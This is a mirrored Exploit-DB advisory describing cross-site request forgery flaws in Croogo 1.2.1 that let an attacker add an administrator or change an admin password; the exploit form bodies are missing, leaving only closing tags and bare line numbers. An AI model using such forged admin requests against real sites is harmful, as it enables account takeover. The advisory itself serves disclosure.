Croogo 1.2.1 – Multiple Cross-Site Request Forgery Vulnerabilities - 体验盒子

作者： Milos Zivanovic

日期： 2010-02-07

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11353/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

[#-----------------------------------------------------------------------------------------------#]

[#] Title: Croogo 1.2.1 Multiple CSRF Vulnerabilities

[#] Author: Milos Zivanovic

[#] Email: milosz.security[at]gmail[dot]com

[#] Date: 07. February 2010.

[#-----------------------------------------------------------------------------------------------#]

[#] Application: Croogo

[#] Version: 1.2.1

[#] Platform: PHP

[#] Site: http://www.croogo.org

[#] Download: http://croogo.googlecode.com/files/croogo-1.2.1.zip

[#] Vulnerability: Cross Site Request Forgery

[#-----------------------------------------------------------------------------------------------#]

Croogo blog script lacks of cross site request forgery protection,

allowing us to make exploit to add new admin user or change existing

admin password.

[#]Content

|--CSRF

|--Add Administrator

|--Change Administrators Password

[*] Add Administrator

[EXPLOIT------------------------------------------------------------------------------------------]

</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[*] Change Administrators Password

In this exploit 1 is the ID of the admin user that we want to edit.

[EXPLOIT------------------------------------------------------------------------------------------]

</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[#]EOF